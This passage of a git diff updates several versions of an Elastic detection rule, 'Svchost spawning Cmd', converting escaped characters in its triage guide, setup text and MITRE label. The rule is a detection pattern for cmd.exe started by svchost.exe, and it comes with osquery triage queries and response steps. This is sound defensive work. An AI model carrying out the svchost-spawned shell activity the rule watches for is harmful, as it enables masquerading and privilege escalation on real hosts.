concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n\n process.parent.name : \"svchost.exe\" and process.name : \"cmd.exe\" and\n\n not process.args :\n (\"??:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat?\",\n \"?:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat\",\n \"\\\\system32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\system32\\\\silcollector.cmd\",\n \"\\\\system32\\\\AppHostRegistrationVerifier.exe\",\n \"\\\\system32\\\\ServerManagerLauncher.exe\",\n \"dir\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\LSDeployment\\\\Lspush.exe\",\n \"(x86)\\\\FMAuditOnsite\\\\watchdog.bat\",\n \"?:\\\\ProgramData\\\\chocolatey\\\\bin\\\\choco-upgrade-all.bat\",\n \"Files\\\\Npcap\\\\CheckStatus.bat\") and\n\n /* very noisy pattern - bat or cmd script executed via scheduled tasks */\n not (process.parent.args : \"netsvcs\" and process.args : (\"?:\\\\*.bat\", \"?:\\\\*.cmd\"))\n", "references": [ "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_107.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_107.json index 412192abec6..976bd35ad59 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_107.json +++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Svchost spawning Cmd", - "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n\n process.parent.name : \"svchost.exe\" and process.name : \"cmd.exe\" and\n\n not process.args :\n (\"??:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat?\",\n \"?:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat\",\n \"\\\\system32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\system32\\\\silcollector.cmd\",\n \"\\\\system32\\\\AppHostRegistrationVerifier.exe\",\n \"\\\\system32\\\\ServerManagerLauncher.exe\",\n \"dir\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\LSDeployment\\\\Lspush.exe\",\n \"(x86)\\\\FMAuditOnsite\\\\watchdog.bat\",\n \"?:\\\\ProgramData\\\\chocolatey\\\\bin\\\\choco-upgrade-all.bat\",\n \"Files\\\\Npcap\\\\CheckStatus.bat\") and\n\n /* very noisy pattern - bat or cmd script executed via scheduled tasks */\n not (process.parent.args : \"netsvcs\" and process.args : (\"?:\\\\*.bat\", \"?:\\\\*.cmd\"))\n", "references": [ "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_207.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_207.json index 4b391b74b11..aa003b042ed 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_207.json +++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_207.json @@ -19,7 +19,7 @@ "process.command_line", "user.id" ], - "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "host.os.type:windows and event.category:process and event.type:start and process.parent.name:\"svchost.exe\" and \nprocess.name.caseless:\"cmd.exe\"\n", "references": [ "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_208.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_208.json index 72118fb8379..786d0871700 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_208.json +++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_208.json @@ -19,7 +19,7 @@ "process.command_line", "user.id" ], - "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by 